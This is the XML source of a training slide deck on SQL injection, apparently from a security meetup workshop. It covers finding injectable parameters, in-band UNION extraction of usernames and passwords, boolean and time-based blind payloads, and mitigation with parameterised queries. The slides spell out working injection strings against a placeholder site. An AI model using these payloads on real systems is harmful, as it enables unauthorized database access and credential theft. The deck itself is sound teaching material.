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ff00"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>SQL Injection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ff00"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>Primer &amp; Workshop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78" name="Picture 5" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8229600" y="6208560"/>
            <a:ext cx="3961440" cy="64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00680" y="246600"/>
            <a:ext cx="3183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  <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>Mitigation of SQLi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663440" y="1280160"/>
            <a:ext cx="2694960" cy="3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Parameterised Queries!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4846320" y="3566160"/>
            <a:ext cx="4480200" cy="3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Stored Procedures!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920240" y="2011680"/>
            <a:ext cx="90522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run_query(‘select username, password from users where id = ?’, $username)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2052720" y="2714760"/>
            <a:ext cx="8229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run_query(‘select username, password from users where id = :id:’, $id)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3749040" y="4206240"/>
            <a:ext cx="484596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run_query(‘exec sp_get_user’, @username)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11160" y="3051360"/>
            <a:ext cx="3502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  <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>select beer from frontbar;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375720" y="1951920"/>
            <a:ext cx="474768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  <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>select workshop, url from workshops;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  <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>+---------------------------------------+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  <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>| Home.           | sqli.uid0.sh/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  <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>| In Band         | sqli.uid0.sh/ib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  <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>| Bool Blind SQLi | sqli.uid0.sh/bblind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  <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>| Time Blind SQLi | sqli.uid0.sh/tblind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  <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>| ¯\_(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="00ff00"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>ツ</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="00ff00"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>)_/¯     | sqli.uid0.sh/leet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  <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>+---------------------------------------+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769560" y="493200"/>
            <a:ext cx="3837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  <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>select solutions from workshops;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28680" y="534240"/>
            <a:ext cx="11464920" cy="613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ff00"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>$ whoami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ff00"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>@vortexau – vortex.id.au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ff00"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>Perpetual Noob.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ff00"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>Adelaide SecTalks co-organizer.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ff00"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>9–5: Pentester @ DXC Security.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ff00"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>8–12: Bug Bounty Hunter.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243320" y="1849320"/>
            <a:ext cx="358452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  <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>select topics from contents;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  <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>+--------------------------+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  <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>| OWASP Top10   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  <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>| Finding SQLi  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  <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>| In-Band SQLi  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  <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>| Blind SQLi    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  <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>| Mitigation of SQLi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  <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>| Beer SQLi     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  <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>| Workshop SQLi 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  <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>+--------------------------+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74320" y="182880"/>
            <a:ext cx="4570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  <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>Owasp Top 10, 2017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937760" y="182880"/>
            <a:ext cx="2559600" cy="248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0" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="00ff00"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>A1</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="180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5120640" y="2286000"/>
            <a:ext cx="420552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Inconsolata"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>Injection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4846320" y="3143520"/>
            <a:ext cx="2285280" cy="3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  <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>www.site.com/?id=1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2743200" y="3657600"/>
            <a:ext cx="7223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  <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>select item, description from products where id = $_GET[‘id’]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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5577840" y="4389120"/>
            <a:ext cx="865800" cy="3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  <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>OOPS!!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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4480560" y="5063760"/>
            <a:ext cx="3199680" cy="3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r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="00ff00"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>www.site.com/?</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="00ff00"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>id=1+</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="00ff00"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>and+1=1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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="5577840"/>
            <a:ext cx="7223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  <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>select item, description from products where id = 1 and 1=1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82880" y="217440"/>
            <a:ext cx="1552320" cy="33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solidFill>
                  <a:srgbClr val="00ff00"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>Finding SQLi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111120" y="1226880"/>
            <a:ext cx="64648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site.com/products?id=1</a:t>
            </a:r>
            <a:br/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select product, stockcount from </a:t>
            </a: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products where id = 1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937760" y="640080"/>
            <a:ext cx="292572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Finding SQL </a:t>
            </a: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Injections.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136320" y="3017520"/>
            <a:ext cx="64648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site.com/products?id=1’</a:t>
            </a:r>
            <a:br/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select product, stockcount from </a:t>
            </a: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products where id = 1’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3684960" y="2283120"/>
            <a:ext cx="548640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Enter a single </a:t>
            </a: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quote, and see </a:t>
            </a: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what happens.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3657600" y="4480560"/>
            <a:ext cx="5486400" cy="13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SQL </a:t>
            </a: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Error </a:t>
            </a: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displa</a:t>
            </a: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yed?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HTTP </a:t>
            </a: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Respon</a:t>
            </a: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se </a:t>
            </a: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500?</a:t>
            </a:r>
            <a:br/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Item </a:t>
            </a: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Not </a:t>
            </a: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Found?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82880" y="217080"/>
            <a:ext cx="1552320" cy="33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solidFill>
                  <a:srgbClr val="00ff00"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>In-Band SQLi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017880" y="640080"/>
            <a:ext cx="64918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In-band; where the results are </a:t>
            </a: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returned in the response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2560320" y="3512880"/>
            <a:ext cx="7406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site.com/products?id=1+and+1=1</a:t>
            </a:r>
            <a:br/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select product, stockcount from products where id = 1 or 1=1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3749040" y="4206240"/>
            <a:ext cx="4754520" cy="20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+-------------------------------------+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| product             | stockcount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+-------------------------------------+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| Model Car           | 342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| Model Boat          | 43 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| Model Plane         | 542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| Model Drone         | 43 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+-------------------------------------+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3111120" y="1226880"/>
            <a:ext cx="64648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site.com/products?id=1</a:t>
            </a:r>
            <a:br/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select product, stockcount from products where id = 1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3749040" y="1828800"/>
            <a:ext cx="4754520" cy="155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+-------------------------------------+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| product             | stockcount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+-------------------------------------+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| Model Car           | 342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+-------------------------------------+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82880" y="182880"/>
            <a:ext cx="17762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  <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>In-Band SQLi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017520" y="593280"/>
            <a:ext cx="64918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In-band; where the results are returned in the response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2103480" y="1232280"/>
            <a:ext cx="8137800" cy="20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site.com/products?id=1+and+union+select+username,+password+from+users</a:t>
            </a:r>
            <a:br/>
            <a:br/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select product, stockcount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from products where id = 1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and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union select username, password from users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3729960" y="3275280"/>
            <a:ext cx="4754520" cy="32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+-------------------------------------+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| product             | stockcount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+-------------------------------------+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| Model Car           | 342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| vortex              | password1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| st0rm               | arch4lyfe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| jakob               | xssismybag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| jake                | 1337jake!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| josh                | notcasper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+-------------------------------------+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82880" y="182880"/>
            <a:ext cx="1671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  <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>Blind SQLi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360960" y="813240"/>
            <a:ext cx="5394600" cy="16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Boolean blind</a:t>
            </a:r>
            <a:br/>
            <a:br/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Find the true/false condition</a:t>
            </a:r>
            <a:br/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Useful when there is some visual feedback.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3890160" y="2721960"/>
            <a:ext cx="4572000" cy="69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  <a:ea typeface="Noto Sans CJK SC"/>
              </a:rPr>
              <a:t>site.com/products?id=1+and+1=1 (TRUE)</a:t>
            </a:r>
            <a:br/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site.com/products?id=1+and+1=2 (FALSE)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4663440" y="2790000"/>
            <a:ext cx="274284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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3197160" y="4775760"/>
            <a:ext cx="6123960" cy="3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site.com/products?id=1'+and+substr(user(),1,1)+=+'a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2646000" y="3922560"/>
            <a:ext cx="73152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Use these conditions to extract </a:t>
            </a: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information from the database.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05520" y="3615840"/>
            <a:ext cx="7979400" cy="4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site.com/products?id=1+and+if(mid(version(),1,1)+=+'5',+sleep(15),0)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2742840" y="1661040"/>
            <a:ext cx="7315200" cy="7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Used when there is no visual feedback.</a:t>
            </a:r>
            <a:br/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Uses the true/false condition, by triggering a long wait for true, and false returns instantly.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2773080" y="4942800"/>
            <a:ext cx="7498440" cy="4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Both Blind SQL techniques are quite slow to extract information.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182880" y="182880"/>
            <a:ext cx="1671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  <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>Blind SQLi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5212080" y="914400"/>
            <a:ext cx="2011320" cy="3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Time based blind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</TotalTime>
  <Application>LibreOffice/6.2.4.2.0$Linux_X86_64 LibreOffice_project/20$Build-2</Application>
  <Words>203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2018-06-07T09:48:29Z</dcterms:created>
  <dc:creator>McLean, James</dc:creator>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-07-06T16:14:29Z</dcterms:modified>
  <cp:revision>50</cp:revision>
  <dc:subject/>
  <dc:title>SQL Injection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16.0013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